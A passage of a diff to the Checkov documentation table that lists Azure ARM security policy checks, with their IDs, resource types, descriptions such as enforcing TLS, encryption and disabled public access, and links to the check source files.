[AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 65 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 66 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | 
Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 67 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 68 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 69 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 70 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 71 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 72 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | 
[CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 73 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 74 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 75 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 76 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 77 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 78 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 79 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | 
[SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 80 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 81 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 82 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 83 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 84 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | -| 85 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 86 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable 
public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 87 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 88 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 89 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 90 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 91 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 92 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 93 | CKV2_AZURE_23 | resource | 
Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 94 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | 
[AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | 
[NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 17 | 
CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | 
[SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is 
set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | 
[PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 
'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | +| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | +| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | 
[MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 52 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | +| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | +| 54 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | +| 55 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | +| 56 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | 
[AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | +| 57 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | +| 58 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) | +| 59 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) | +| 60 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | [MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) | +| 61 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) | +| 62 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) | +| 63 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | 
[SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | +| 64 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | +| 65 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) | +| 66 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | +| 67 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) | +| 68 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | +| 69 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | +| 70 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | 
[FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 71 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) | +| 72 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) | +| 73 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) | +| 74 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) | +| 75 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | 